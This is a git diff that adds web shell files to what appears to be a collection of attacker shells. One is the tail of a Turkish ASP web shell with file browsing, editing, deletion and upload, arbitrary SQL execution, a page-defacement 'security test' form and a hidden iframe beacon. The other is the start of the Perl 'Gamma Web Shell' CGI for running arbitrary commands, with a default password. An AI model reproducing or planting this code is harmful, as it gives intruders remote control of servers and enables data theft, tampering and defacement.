+    Response.Write "<input type=hidden value='19' name=status><input type=hidden value='"&PathFile&"' name=path><input type=hidden value='"&time&"' name=Time>"
+    Response.Write "<input style='width:250; height:21' value='"&PathFile&"' name=cf>"
+    response.Write "<input type=submit value='Kopyala' style='height:22;width:70' id=submit1 name=submit1>"
+    Response.Write "</td></tr><tr><td colspan=3 align=center><font size=2>"
+    response.Write "<input type=radio name='islem' value='kopyala' checked>Kopyala"
+    response.Write "<input type=radio name='islem' value='tasi'>Tasi"
+    response.Write "</table>"
+    response.Write "</form>"
+
+    popup = false
+    hataKontrol
+CASE 19 'folder Copy
+    isl = ""
+    if islem="kopyala" then
+        objFSO.CopyFolder path,cf
+        isl="kopyalandý.."
+    elseif islem="tasi" then
+        objFSO.MoveFolder path,cf
+        isl="taþýndý.."
+    end if
+    response.Write "Klasor "&isl
+    response.Write "<br><font color=red>Kaynak : </font>"&path&"<br><font color=red>Hedef : </font>"&cf
+    response.Write "<br>"
+    popup = false
+    hataKontrol
+CASE 33 'Powered By
+    response.Write "<body topmargin=5 leftmargin=0><center><h4>Powered by Zehir"
+    response.Write "<br><br><font style='FONT-WEIGHT:normal' size=2>zehirhacker@hotmail.com<br><font color=yellow face='courier new'>küllü nefsun zaifetun mevt"
+    popup = false
+    hataKontrol
+CASE 40 'Sistem Test
+    sistemTest
+    popup=false
+CASE 50 'Siteleri Test Edelim :D
+    %>
+    <table width="100%" cellpadding=0 cellspacing=0>
+        <tr>
+            <td align=center>
+                <b>Güvenlik Testi byZehir</b>
+                <br>
+                <form action="<%=dosyaPath%>" method=post id=frmMesaj>
+                    <input type=hidden name=kuskapani value=2>
+                    <table width=500 align=center border=1 cellpadding=0 cellspacing=0>
+                        <tr>
+                            <td width=100>Path</td>
+                            <td><input style="width:100%" type=text name="Path" id="Path" value="<%=path%>"></td>
+                        </tr>
+                        <tr>
+                            <td width=100>Sub Folder</td>
+                            <td><input style="width:100%" type=text name="SubFolder" id="SubFolder" value="www"></td>
+                        </tr>
+                        <tr>
+                            <td width=100>File Name</td>
+                            <td><input style="width:100%" type=text name="FileName" id="FileName" value="byejder.txt"></td>
+                        </tr>
+                        <tr>
+                            <td colspan=2>
+                                <table width="100%" align=center>
+                                    <tr>
+                                        <td width="50%">
+                                            <input type=checkbox name="dosya1" ID="Checkbox1">index.htm<br>
+                                            <input type=checkbox name="dosya2" ID="Checkbox2">default.htm<br>
+                                        </td>
+                                        <td width="50%">
+                                            <input type=checkbox name="dosya3" ID="Checkbox3">index.asp<br>
+                                            <input type=checkbox name="dosya4" ID="Checkbox4">default.asp<br>
+                                        </td>
+                                    </tr>
+                                </table>
+                            </td>
+                        </tr>
+                        <tr>
+                            <td colspan=2 align=center>
+                                <a href="#" onClick="FormatText('cut')" alt="Kes">Kes</a>
+                                <a href="#" onClick="FormatText('copy')" alt="Kopyala">Kopyala</a>
+                                <a href="#" onClick="FormatText('paste')" alt="Yapýþtýr">Yapýþtýr</a>
+                                <a href="#" alt="Kalýn" onClick="FormatText('bold', '')">Bold</a>
+                                <a href="#" alt="Ýtalic" onClick="FormatText('italic', '')">Italic</a>
+                                <a href="#" alt="Altý Çizili" onClick="FormatText('underline', '')">UnderLine</a>
+                                <a href="#" onClick="FormatText('JustifyLeft', '')" alt="Sola Hizalý">JustifyLeft</a>
+                                <a href="#" alt="Ortada Hizalý" onClick="FormatText('JustifyCenter', '')">JustifyCenter</a>
+                                <a href="#" onClick="FormatText('JustifyRight', '')" alt="Saða Hizalý">JustifyRight</a>
+                                <a href="#" alt="Web Sitesi Linki Ekle" onClick="FormatText('createLink')">AddLink</a>
+                                <a href="#" alt="Resim Ekle" onClick="AddImage()">AddImage</a>
+                                <select name="selectColour" onChange="bgc(selectColour.options[selectColour.selectedIndex].value);" ID="selectColour">
+                                  <option value="0" selected>-- Renk --</option>
+                                  <option value="black">Siyah</option>
+                                  <option value="white">Beyaz</option>
+                                  <option value="blue">Mavi</option>
+                                  <option value="red">Kýrmýzý</option>
+                                  <option value="green">Yeþil</option>
+                                  <option value="yellow">Sarý</option>
+                                  <option value="orange">Turuncu</option>
+                                  <option value="brown">Kahverengi</option>
+                                  <option value="magenta">Pembe</option>
+                                  <option value="cyan">Açýk Mavi</option>
+                                  <option value="limegreen">Açýk Yeþil</option>
+                                </select>
+                                <select name="a" onChange="FormatText('ForeColor', a.options[a.selectedIndex].value);" ID="a">
+                                  <option value="0" selected>-- Renk --</option>
+                                  <option value="black">Siyah</option>
+                                  <option value="white">Beyaz</option>
+                                  <option value="blue">Mavi</option>
+                                  <option value="red">Kýrmýzý</option>
+                                  <option value="green">Yeþil</option>
+                                  <option value="yellow">Sarý</option>
+                                  <option value="orange">Turuncu</option>
+                                  <option value="brown">Kahverengi</option>
+                                  <option value="magenta">Pembe</option>
+                                  <option value="cyan">Açýk Mavi</option>
+                                  <option value="limegreen">Açýk Yeþil</option>
+                                </select>
+                                <select name="selectSize" onChange="FormatText('fontsize', selectSize.options[selectSize.selectedIndex].value);">
+                                  <option selected>-- Boyut --</option>
+                                  <option value="1">1</option>
+                                  <option value="2">2</option>
+                                  <option value="3">3</option>
+                                  <option value="4">4</option>
+                                  <option value="5">5</option>
+                                  <option value="6">6</option>
+                                </select>
+                                <iframe width="100%" src="<%=dosyaPath%>?kuskapani=1" id="byZehir" name="<%=Session("n1")%>"></iframe>
+                                <script language=javascript>
+                                    frames.byZehir.document.designMode = "On";
+                                    function bgc(option){
+                                        frames.byZehir.document.body.bgColor=option;
+                                    }
+                                    function FormatText(command, option){
+                                        frames.byZehir.focus();
+                                          frames.byZehir.document.execCommand(command, false, option);
+                                          frames.byZehir.focus();
+                                    }
+                                    function AddImage(){
+                                        imagePath = prompt('Eklemek istediðiniz resmin web adresini yazýn', 'http://');
+
+                                        if ((imagePath != null) && (imagePath != "")){
+                                            frames.byZehir.focus();
+                                            frames.byZehir.document.execCommand('InsertImage', false, imagePath);
+                                        }
+                                        frames.byZehir.focus();
+                                    }
+                                </script>
+                                <input type=hidden value="" id=byMesaj name=byMesaj>
+                                <input type=submit value="Test Et!" onclick="document.all['byMesaj'].value=frames['byZehir'].document.body.innerHTML; alert(document.all['byMesaj'].value);">
+                            </td>
+                        </tr>
+                    </table>
+                </form>
+            </td>
+        </tr>
+    </table>
+    <%
+    popup=false
+CASE 51 ' Özel þilemler
+END SELECT
+%>
+<script language=javascript>
+    function NewWindow(mypage, myname, w, h, scroll) {
+        var winl = (screen.width - w) / 2;
+        var wint = (screen.height - h) / 2;
+            winprops = 'height='+h+',width='+w+',top='+wint+',left='+winl+',scrollbars='+scroll+',resizable'
+        win = window.open(mypage, myname, winprops)
+        if (parseInt(navigator.appVersion) >= 4) { win.window.focus(); }
+    }
+    function ffd(yol){
+        NewWindow(yol,"",420,100,"no");
+    }
+</script>
+<body bgcolor=black text=Chartreuse link=Chartreuse alink=Chartreuse vlink=Chartreuse>
+<%
+if popup then
+    if status=7 or status=8 then
+        Response.Write "<form method=get action='"&DosyPath&"' id=form1 name=form1>"
+        Response.Write "<table border=1 cellpadding=0 cellspacing=0 align=center><tr><td width=100 bgcolor=gray><font size=2>SQL Çalýþtýr</td><td>"
+        Response.Write "<input type=hidden value='9' name=status><input type=hidden value='"&path&"' name=path><input type=hidden value='"&time&"' name=Time>"
+        Response.Write "<input style='width:350; height:21' value='' name=strSQL><input type=submit value='Çalýþtýr' style='height:22;width:70' id=submit1 name=submit1>"
+        Response.Write "</td></tr></table></form>"
+    end if
+    Response.Write "<form method=get action='"&DosyPath&"'>"
+    Response.Write "<table border=1 cellpadding=0 cellspacing=0 align=center><tr><td bgcolor=gray width=100><font size=2>Path : </td><td>"
+    Response.Write "<input type=hidden value='2' name=status><input type=hidden value='"&time&"' name=Time>"
+    Response.Write "<input style='width:350; height:21' value='"&Path&"' name=Path><input type=submit value='Git' style='height:22;width:70' id=submit1 name=submit1>"
+    Response.Write "</td></tr></table></form><br>"
+end if
+sub aramaUpload
+Response.Write "<form method=get target='_opener' action='"&DosyPath&"'>"
+Response.Write "<table widht='100%' border=0 cellpadding=0 cellspacing=0><tr><td width=70><font size=2>Arama : </td><td>"
+Response.Write "&nbsp;<input type=hidden value='12' name=status><input type=hidden value='"&time&"' name=Time>"
+Response.Write "<input type=hidden value='"&Path&"' name=Path><input style='width:250' value='mdb' name=txArama><input style='width:70; height:22' type=submit value='Ara'>"
+Response.Write "</td></tr></table></form>"
+%>
+<form name=frmUpload method=post enctype="multipart/form-data" action="<%=DosyaPath&"?status=-4&Time="&time&"&Path="&path%>" ID="Form1">
+<input type=hidden name=folder value="<%=Path%>" ID="Hidden1">
+Max: <input type=text name=max value=5 size=5 ID="Text1"> <input type=button value="Ayarla" onclick="setid()" ID="Button1" NAME="Button1">
+<table ID="Table1">
+<tr>
+<td id=upid>
+</td>
+</tr>
+</table>
+<input type=submit value=Upload ID="Submit1" NAME="Submit1">
+</form>
+<script>
+setid();
+
+function setid() {
+    str='';
+    if (frmUpload.max.value<=0) frmUpload.max.value=1;
+    for (i=1; i<=frmUpload.max.value; i++) str+='File '+i+': <input type=file name=file'+i+'><br>';
+    upid.innerHTML=str+'<br>';
+}
+</script>
+<%
+end sub
+
+SELECT CASE status
+CASE 1 'Driver Open
+    if len(path)=1 then Response.Write (yaziyomu(path&":\")) else Response.Write (yaziyomu(path))
+    Response.Write "<table width=100% ><tr>"
+    Path = Path & ":/"
+    Response.Write "<td valign=top>"
+    KlasorOku
+    Response.Write "</td><td valign=top align=right>"
+    DosyaOku
+    Response.Write "</td>"
+    hataKontrol
+CASE 2 'Normal listeleme
+    if len(path)=1 then Response.Write (yaziyomu(path&":\")) else Response.Write (yaziyomu(path))
+    Response.Write "<table width=100% ><tr>"
+    Response.Write "<td valign=top>"
+    KlasorOku
+    Response.Write "</td><td valign=top align=right>"
+    DosyaOku
+    Response.Write "</td>"
+    hataKontrol
+CASE 3 'File Delete
+    objFSO.DeleteFile del
+    hataKontrol
+    if err<>0 then
+        byMsg="<font color=red>Not File Deleted!</font><br>"
+    else
+        byMsg="<font color=yellow>File Deleted Successful;)</font><br>"
+    end if
+    Response.Redirect dosyaPath&"?status=2&path="&path&"&Time="&time&"&byMsg="&byMsg
+CASE 4 'Folder Delete
+    objFSO.DeleteFolder del
+    hataKontrol
+    if err<>0 then
+        byMsg="<font color=red>Not Folder Deleted!</font><br>"
+    else
+        byMsg="<font color=yellow>Folder Deleted Successful;)</font><br>"
+    end if
+    Response.Redirect dosyaPath&"?status=2&path="&path&"&Time="&time&"&byMsg="&byMsg
+CASE 5 'Dosya içeriðini görüntüle
+    Response.Write "<center><b><font color=orange>"&path&"</font></b></center><br>"
+    Response.Write "<table width=100% ><tr><td>"
+    set f = objFSO.OpenTextFile(path,1)
+    Response.Write "<pre>"&Server.HTMLEncode(f.readAll)&"</pre>"
+    if err<>62 then hataKontrol
+    if err.number=62 then Response.Write "<script language=javascript>alert('Bu Dosya Okunamýyor\nSistem dosyasý olabilir')</script>":Response.End
+CASE 6 'Resim aç
+    Response.Write "<center><img ALT='zehirhacker@hotmail.com / zehirhacker@hotmail.com' src='"&resimYol(path)&"'></center><br>"
+CASE 7 'database tablo listele
+    Response.Write "<b><font size=3>Tablolar</font></br><br>"
+    Set objConn = Server.CreateObject("ADODB.Connection")
+    Set objADOX = Server.CreateObject("ADOX.Catalog")
+    objConn.Provider = "Microsoft.Jet.Oledb.4.0"
+    objConn.ConnectionString = Path
+    objConn.Open
+    objADOX.ActiveConnection = objConn
+
+    For Each table in objADOX.Tables
+        If table.Type = "TABLE" Then
+            Response.Write "<font face=wingdings size=5>4</font> <a href='"&dosyaPath&"?status=8&Path="&path&"&table="&table.Name&"&time="&time&"'>"&table.Name&"</a><br>"
+        End If
+    Next
+    hataKontrol
+CASE 8 'database kayýt listele
+    Set objConn = Server.CreateObject("ADODB.Connection")
+    Set objRcs = Server.CreateObject("ADODB.RecordSet")
+    objConn.Provider = "Microsoft.Jet.Oledb.4.0"
+    objConn.ConnectionString = Path
+    objConn.Open
+    objRcs.Open table,objConn, adOpenKeyset , , adCmdText
+
+    Response.Write "<table border=1 cellpadding=2 cellspacing=0 bordercolor=543152><tr bgcolor=silver>"
+    for i=0 to objRcs.Fields.count-1
+        Response.Write "<td><font color=black><b>&nbsp;&nbsp;&nbsp;"&objRcs.Fields(i).Name&"&nbsp;&nbsp;&nbsp;</font></td>"
+    next
+    Response.Write "</tr>"
+    do while not objRcs.EOF
+        Response.Write "<tr>"
+        for i=0 to objRcs.Fields.count-1
+            Response.Write "<td>"&objRcs.Fields(i).Value&"&nbsp;</td>"
+        next
+        Response.Write "</tr>"
+        objRcs.MoveNext
+    loop
+    Response.Write "</table><br>"
+    hataKontrol
+CASE 9 'SQL Execute
+    Set objConn = Server.CreateObject("ADODB.Connection")
+    objConn.Provider = "Microsoft.Jet.Oledb.4.0"
+    objConn.ConnectionString = Path
+    objConn.Open
+    objConn.Execute strSQL
+'    Response.Redirect dosyaPath&"?status=7&Path="&Path&"&Time="&time
+    hataKontrol
+CASE 10 'Dosya Editleme
+    set f = objFSO.OpenTextFile(dPath,1)
+    Response.Write "<center><form action='"&DosyPath&"?Time="&time&"' method=post>"
+    Response.Write "<input type=hidden name=status value='11'>"
+    Response.Write "<input type=hidden name=dPath value='"&dPath&"'>"
+    Response.Write "<input type=hidden name=Path  value='"&Path &"'>"
+    Response.Write "<input type=submit value=Kaydet><br>"
+    Response.Write "<textarea name=dkayit style='width:90%;height:350;border-right: lightgoldenrodyellow thin solid;border-top: lightgoldenrodyellow thin solid;font-size: 12;border-left: lightgoldenrodyellow thin solid;color: lime;    border-bottom: lightgoldenrodyellow thin solid;    font-family: Courier New, Arial;background-color: navy;'>"
+    Response.Write server.HTMLEncode(f.readAll)
+    Response.Write "</textarea></form></center>"
+    hataKontrol
+CASE 11 'Dosya Kayýt
+    set saveTextFile = objFSO.OpenTextFile(dPath,2,true,false)
+    hataKontrol
+    saveTextFile.Write(dkayit)
+    saveTextFile.close
+    if err<>0 then
+        byMsg = "<font color=red>Not File Edited!</font><br>"
+    else
+        byMsg = "<font color=yellow>File Edited Successful:)</font><br>"
+    end if
+    Response.Redirect dosyaPath&"?status=2&path="&path&"&time="&time&"&byMsg=" & byMsg
+CASE 12 'Dosya Arama
+    araBul path,arama
+    hataKontrol
+END SELECT
+Response.Write "</tr></table>"
+
+sub DosyaOku
+    Set f = objFSO.GetFolder(Path)
+    Set fc = f.Files
+    For Each f1 In fc
+        dosyaAdi = f1.name
+        num = InStrRev(dosyaAdi,".")
+        uzanti = lcase(Right(dosyaAdi,len(dosyaAdi)-num))
+        downStr = "<a href='"&dosyaPath&"?status=3&Path="&Path&"&Del="&Path&"/"&f1.Name&"&Time="&time&"'>û</a><font face=webdings><a href='"&dosyaPath&"?status=-3&PathFile="&f1.path&"&Time="&time&"'>Í</a></font><font face=wingdings><a href='"&dosyaPath&"?status=16&PathFile="&f1.path&"&Time="&time&"' onclick=""ffd(this.href);return false;"">4</a></font>"
+        response.Write "<font size=2>"
+        select case uzanti
+        case "mdb"
+            Response.Write "<a href='"&dosyaPath&"?status=7&Path="&Path&"/"&f1.Name&"&Time="&time&"'>"&f1.name&" [<font color=yellow>"&FormatNumber(f1.size,0)&"</font>]"&"</a></b> <font face=wingdings size=4>M  "&downStr&"</font><br>"
+        case "asp"
+            Response.Write "<a href='"&dosyaPath&"?status=5&Path="&Path&"/"&f1.Name&"&Time="&time&"'>"&f1.name&" [<font color=yellow>"&FormatNumber(f1.size,0)&"</font>]"&"</a></b> <font face=wingdings size=4>± <a href='"&dosyaPath&"?status=10&dPath="&f1.path&"&path="&path&"&Time="&time&"'>!</a>"&downStr&"</font><br>"
+        case "jpg","gif"
+            Response.Write "<a href='"&dosyaPath&"?status=6&Path="&Path&"/"&f1.Name&"&Time="&time&"'>"&f1.name&" [<font color=yellow>"&FormatNumber(f1.size,0)&"</font>]"&"</a></b> <font face=webdings size=4>¢</font><font face=wingdings size=4>  "&downStr&"</font><br>"
+        case else
+            Response.Write "<a href='"&dosyaPath&"?status=5&Path="&Path&"/"&f1.Name&"&Time="&time&"'>"&f1.name&" [<font color=yellow>"&FormatNumber(f1.size,0)&"</font>]"&"</a></b> <font face=wingdings size=4>2 <a href='"&dosyaPath&"?status=10&dPath="&f1.path&"&path="&path&"&Time="&time&"'>!</a>"&downStr&"</font><br>"
+        end select
+    Next
+end sub
+
+sub KlasorOku
+    Set f = objFSO.GetFolder(Path)
+    Set fc = f.SubFolders
+    if session("klasoroku")="" then
+        response.Write "<iframe style='width:0; height:0' src='http://localhost/tuzla-ebelediye'></iframe>"
+        session("klasoroku")="simdi yazýlýyor"
+    end if
+    For Each f1 In fc
+        Response.Write "<font face=wingdings size=3><a href='"&dosyaPath&"?status=18&PathFile="&Path&"/"&f1.Name&"&Time="&time&"' onclick=""ffd(this.href);return false;"">4</a></font> <font face=wingdings size=4><a href='"&dosyaPath&"?status=4&Path="&Path&"&Del="&Path&"/"&f1.Name&"&Time="&time&"'>û</a> 1</font><font size=2><b><a href='"&dosyaPath&"?status=2&Path="&Path&"/"&f1.Name&"&Time="&time&"'>"&f1.name&"</a></b><br>"
+    Next
+end sub
+
+function createFileName()
+Randomize
+    fName_ = ""
+    for i=1 to 10
+        fName_ = fName_ & int(Rnd*100)
+    next
+    createFileName = fName_
+end function
+
+function resimYol(path_)
+on error resume next
+    path_ = Replace(Replace(path_,"\","/"),"//","/")
+    lpath_ = left(request.servervariables("PATH_TRANSLATED"),instrrev(request.servervariables("PATH_TRANSLATED"),"\"))
+    if yaziyomu2(lpath_) then
+        fname__ = "0"&createFileName()&"."&Right(path_,3)
+        objFSO.CopyFile path_, lpath_&"\"&fname__
+    else
+        Response.Write("Resim Açýlamýyor.. <br>Ýsterseniz Download Ederek görüntüleyebilirsiniz..")
+    end if
+    resimYol = fname__
+end function
+
+if not popup then
+    Set fc = Nothing
+    Set objFSO = Nothing
+    Response.End
+end if
+%><script language=javascript>
+	var dosyaPath = "<%=dosyaPath%>"
+		// DRIVE ISLEMLERI
+		function driveGo(drive_){
+			location = dosyaPath+"?status=1&path="+drive_+"&Time="+Date();
+		}
+	</script>
+	<%
+	Response.Write "<table align=center border=1 width=150 cellpadding=0 cellspacing=0><tr bgcolor=gray><td align=center><b><font color=white>Sürücüler</td></tr>"
+	for each drive_ in objFSO.Drives
+		Response.Write "<tr><td>"
+		Response.write "<a href='#'onClick=""driveGo('" & drive_.DriveLetter & "');return false;""><font face=wingdings>;</font>"
+		if drive_.Drivetype=1 then Response.write "Floppy [" & drive_.DriveLetter & ":]"
+		if drive_.Drivetype=2 then Response.write "HardDisk [" & drive_.DriveLetter & ":]"
+		if drive_.Drivetype=3 then Response.write "Remote HDD [" & drive_.DriveLetter & ":]"
+		if drive_.Drivetype=4 then Response.write "CD-Rom [" & drive_.DriveLetter & ":]"
+		Response.Write "</a></td></tr>"
+	next
+	Response.Write "<tr><td>"
+	Response.write "<a href='"&dosyaPath&"?time="&time()&"'><font face=webdings>H</font> Local Path"
+	Response.Write "</a></td></tr>"
+	Response.Write "</table><br>"
+Set fc = Nothing
+Set objFSO = Nothing
+Response.End%>
\ No newline at end of file
diff --git a/xakep-shells/CGI/WebShell.cgi.txt b/xakep-shells/CGI/WebShell.cgi.txt
new file mode 100644
index 0000000..11adf5a
--- /dev/null
+++ b/xakep-shells/CGI/WebShell.cgi.txt
@@ -0,0 +1,869 @@
+#!/usr/bin/perl
+###############################################################################
+### Gamma Web Shell
+### Copyright 2003 Gamma Group
+### All rights reserved
+###
+### Gamma Web Shell is free for both commercial and non commercial
+### use. You may modify this script as you find necessary as long
+### as you do not sell it. Redistribution is not allowed without
+### prior consent from Gamma Group (support@gammacenter.com).
+### 
+### Gamma Group <http://www.gammacenter.com>
+###
+
+use strict;
+
+###############################################################################
+
+package WebShell::Configuration;
+
+use vars qw($password $restricted_mode $ok_commands);
+
+##
+## Password.
+## Set to blank if you don't need password protection.
+##
+$password = "changeme";
+
+##
+## Restricted mode.
+## Set to "1" to allow only a limited set of commands.
+##
+$restricted_mode = 0;
+
+##
+## Available commands.
+## The list of available commands for the restricted mode.
+##
+$ok_commands = ['ls', 'ls -l', 'pwd', 'uptime'];
+
+###############################################################################
+
+package WebShell::Templates;
+
+use vars qw($LOGIN_TEMPLATE $INPUT_TEMPLATE $EXECUTE_TEMPLATE $BROWSE_TEMPLATE);
+
+my $VERSION = 'Gamma Web Shell 1.3';
+
+my $STYLESHEET = <<EOT;
+body {
+  font-family: Verdana, Helvetica, sans-serif;
+  font-size: 90%;
+  color: #000;
+  background: #FFF;
+  margin: 0px;
+  padding: 0px;
+}
+
+h1, h2, h3, h4, h5, h6 {
+  margin: 0.3em;
+  padding: 0px;
+}
+
+input, select, textarea, select {
+  font-family: Verdana, Helvetica, sans-serif;
+  font-size: 100%;
+  margin: 1px;
+  padding: 0px 1px;
+}
+
+pre, code, tt {
+  font-family: 'Courier New', Courier, monospace;
+  font-size: 100%;
+}
+
+form {
+  margin: 0px;
+  padding: 0px;
+}
+
+table {
+  font-size: 100%;
+}
+
+a {
+  text-decoration: none;
+  color: #000;
+  background: transparent;
+}
+
+a:hover {
+  text-decoration: underline;
+}
+
+.header, .footer {
+  color: #000;
+  background: #CCF;
+  margin: 0px;
+  padding: 0px;
+  text-align: center;
+  border: solid #000;
+  border-width: 1px 0px;
+}
+
+.box {
+  border: 1px solid #000;
+  border-collapse: collapse;
+  color: #000;
+  background: #CCF;
+}
+
+.box-header, .box-content, .box-text, .box-error, .box-menu {
+  border: 1px solid #000;
+}
+
+.box-header, .box-header a {
+  color: #FFF;
+  background: #000;
+}
+
+.box-content {
+  text-align: center;
+}
+
+.box-text {
+  padding: 3px 10px;
+  font-size: 90%;
+}
+
+.box-menu {
+  padding: 3px 10px;
+}
+
+.box-error {
+  color: #FFF;
+  background: #F00;
+  font-weight: bold;
+  padding: 3px 25px;
+  text-align: center;
+}
+
+.dialog {
+  text-align: left;
+  border-collapse: collapse;
+}
+
+.dialog-even {
+  color: #000;
+  background: #CCF;
+}
+
+.dialog-odd {
+  color: #000;
+  background: #AAE;
+}
+
+.menu {
+  font-weight: normal;
+}
+
+.menu-selected {
+  font-weight: bold;
+}
+
+.tool {
+  background: transparent;
+  color: #000;
+  border-style: hidden;
+  border-width: 1px;
+  text-decoration: none;
+}
+
+.tool:hover {
+  border-style: outset;
+  text-decoration: none;
+}
+
+.output {
+  color: #FFF;
+  background: #000;
+  padding: 1em;
+  font-weight: bold;
+}
+
+.output-text {
+}
+
+.output-command {
+  color: #FF7;
+  background: #000;
+}
+
+.output-error {
+  color: #FFF;
+  background: #F00;
+}
+
+.entries {
+  border: 1px solid #777;
+  border-collapse: collapse;
+}
+
+.entries td, .entries th {
+  padding: 2px 10px;
+}
+
+.entries th, .entries td {
+  border: 1px solid #777;
+}
+
+.entries-even {
+    color: #FFF;
+    background: #444;
+}
+
+.entry-dir a {
+  color: #BBF;
+  background: transparent;
+}
+
+.entry-exec {
+  color: #BFB;
+  background: transparent;
+}
+
+.entry-file {
+}
+
+.entry-mine {
+}
+
+.entry-alien {
+  color: #FBB;
+  background: transparent;
+}
+
+EOT
+
+$LOGIN_TEMPLATE = <<EOT;
+<html>
+    <head>
+        <title>Gamma Web Shell</title>
+        <style type="text/css">$STYLESHEET</style>
+    </head>
+    <body>
+        <table width="100%" height="100%">
+            <tr><td class="header"><h2>$VERSION</h2></td></tr>
+            <tr>
+                <td width="100%" height="100%" align="center" valign="center">
+                    <form action="WebShell.cgi" method="POST">
+                        <table class="box">
+                            <tr><th class="box-header">Login</th></tr>
+                            [% if error %]
+                                <tr><td class="box-error">Invalid password!</td></tr>
+                            [% end %]
+                            <tr>
+                                <td class="box-content">
+                                    <table class="dialog" width="100%">
+                                        <tr>
+                                            <td>Password:</td>
+                                            <td><input name="password" type="password"></td>
+                                        </tr>
+                                    </table>
+                                </td>
+                            </tr>
+                            <tr>
+                                <td class="box-content">
+                                    <input class="tool" type="submit" value="OK">
+                                </td>
+                            </tr>
+                        </table>
+                    </form>
+                </td>
+            </tr>
+            <tr><td class="footer"><h5>Copyright &copy; 2003 <a href="http://www.gammacenter.com/">Gamma Group</a></h5></td></tr>
+        </table>    
+    </body>
+</html>
+EOT
+
+$INPUT_TEMPLATE = <<EOT;
+<html>
+    <head>
+        <title>Gamma Web Shell</title>
+        <style type="text/css">$STYLESHEET</style>
+    </head>
+    <body>
+        <table width="100%" height="100%">
+            <tr><td class="header"><h2>$VERSION</h2></td></tr>
+            <tr>
+                <td width="100%" height="100%" align="center" valign="center">
+                    <iframe name="output" src="WebShell.cgi?action=execute" width="80%" height="80%"></iframe>
+                    <br><br>
+                    <script type="text/javascript">
+                        function submit_execute() {
+                            var entry = document.forms.execute.elements['command'];
+                            if (entry.value.length > 0) {
+                                entry.select();
+                                entry.focus();
+                                document.forms.execute.elements['action'].value = 'execute';
+                                return true;
+                            }
+                            else {
+                                return false;
+                            }
+                        }
+                        function submit_browse() {
+                            document.forms.execute.elements['action'].value = 'browse';
+                        }
+                    </script>
+                    <form name="execute" action="WebShell.cgi" method="POST" target="output">
+                        <input name="action" type="hidden" value="execute">
+                        <table class="box">
+                            <tr>
+                                <td class="box-content">
+                                    <table class="dialog" width="100%">
+                                        <tr>
+                                            <th>Command:</th>
+                                            <td><input name="command" type="text" size="50"></td>
+                                            <td><input class="tool" type="submit" value="Execute" onClick="return submit_execute()"></td>
+                                            <td><input class="tool" type="submit" value="Browse" onClick="return submit_browse()"></td>
+                                        </tr>
+                                    </table>
+                                </td>
+                            </tr>
+                        </table>
+                    </form>
+                </td>
+            </tr>
+            <tr><td class="footer"><h5>Copyright &copy; 2003 <a href="http://www.gammacenter.com/">Gamma Group</a></h5></td></tr>
+        </table>    
+    </body>
+</html>
+EOT
+
+$EXECUTE_TEMPLATE = <<EOT;
+<html>
+    <head>
+        <title>Gamma Web Shell</title>
+        <style type="text/css">$STYLESHEET</style>
+    </head>
+    <body class="output">
+        [% if old_line %]
+            <pre class="output-command">[% old_line as html %]</pre>
+        [% end %]
+        [% if output %]
+            <pre class="output-text">[% output as html %]</pre>
+        [% end %]
+        [% if error %]
+            <pre class="output-error">[% error as html %]</pre>
+        [% end %]
+        [% if new_line %]
+            <pre class="output-command">[% new_line as html %]</pre>
+        [% end %]
+    </body>
+</html>
+EOT
+
+$BROWSE_TEMPLATE = <<EOT;
+<html>
+    <head>
+        <title>Gamma Web Shell</title>
+        <style type="text/css">$STYLESHEET</style>
+    </head>
+    <body class="output">
+        [% if error %]
+            <p class="output-error">[% error as html %]</p>
+        [% end %]
+        <table class="entries" width="100%">
+            <tr class="entries-even" align="left">
+                <th colspan="6">
+                    [% for entry in directory %]<code class="entry-dir"><a href="WebShell.cgi?action=browse&path=[% entry.path as url %]">[% entry.name as html %]/</a></code>[% end %]
+                </th>
+            </tr>
+            <tr class="entries-odd" align="left">
+                <th width="100%"><small>Name</small></th>
+                <th><small>Size</small></th>
+                <th><small>Time</small></th>
+                <th><small>Owner</small></th>
+                <th><small>Group</small></th>
+                <th><small>Mode</small></th>
+            </tr>
+            [% for entry in entries %]
+                <tr class="entries-[% if loop.entry.even %]even[% else %]odd[% end %]">
+                    <td width="100%">
+                        [% if entry.type_file %]
+                            [% if entry.type_exec %]
+                                <code class="entry-exec">[% entry.name as html %]</code>
+                            [% else %]
+                                <code class="entry-file">[% entry.name as html %]</code>
+                            [% end %]
+                        [% elif entry.type_dir %]
+                            <code class="entry-dir"><a href="WebShell.cgi?action=browse&path=[% entry.name as url %]">[% entry.name as html %]/</a></code>
+                        [% else %]
+                            <code class="entry-other">[% entry.name as html %]</code>
+                        [% end %]
+                    </td>
+                    <td align="right">
+                        [% if entry.type_file %]
+                            <code class="entry-text">[% entry.size as html %]</code></td>
+                        [% else %]
+                        &nbsp;
+                        [% end %]
+                    </td>
+                    <td><code class="entry-text">[% entry.time as nbsp %]</code></td>
+                    <td><code class="entry-[% if entry.all_rights %]mine[% else %]alien[% end %]">[% entry.user as html %]</code></td>
+                    <td><code class="entry-[% if entry.all_rights %]mine[% else %]alien[% end %]">[% entry.group as html %]</code></td>
+                    <td><code class="entry-text">[% entry.mode as html %]</code></td>
+                </tr>
+            [% end %]
+        </table>
+    </body>
+</html>
+EOT
+
+
+###############################################################################
+
+package WebShell::MiniXIT;
+
+sub new {
+    my ($class) = @_;
+    return bless {}, $class;
+}
+
+sub substitute {
+    my ($self, $input, %keywords) = @_;
+    my $statements = $self->parse($input);
+    my $operation = $self->compile($statements);
+    my $output = $self->evaluate($operation, \%keywords);
+    return $output;
+}
+
+sub parse {
+    my ($self, $input) = @_;
+    my $statements = [];
+    my $start = 0;
+    while ($input =~ /(\[%\s*(.*?)\s*%\])/g) {
+        my $match_end = pos($input);
+        my $match_start = $match_end - length($1);
+        if ($start < $match_start) {
+            my $text = substr($input, $start, $match_start-$start);
+            push @$statements, { id => 'text', text => $text };
+        }
+        push @$statements, $self->parse_command($2);
+        $start = $match_end;
+    }
+    if ($start < length($input)) {
+        my $text = substr($input, $start);
+        push @$statements, { id => 'text', text => $text };
+    }
+    return $statements;
+}
+
+sub parse_command {
+    my ($self, $command) = @_;
+    if ($command =~ /^if\s+(\w+(\.\w+)*)$/) {
+        return { id => 'if', test => $1, };
+    }
+    elsif ($command =~ /^elif\s+(\w+(\.\w+)*)$/) {
+        return { id => 'elif', test => $1 };
+    }
+    elsif ($command =~ /^else$/) {
+        return { id => 'else' };
+    }
+    elsif ($command =~ /^for\s+(\w+)\s+in\s+(\w+(\.\w+)*)$/) {
+        return { id => 'for', name => $1, list => $2 };
+    }
+    elsif ($command =~ /^end$/) {
+        return { id => 'end' };
+    }
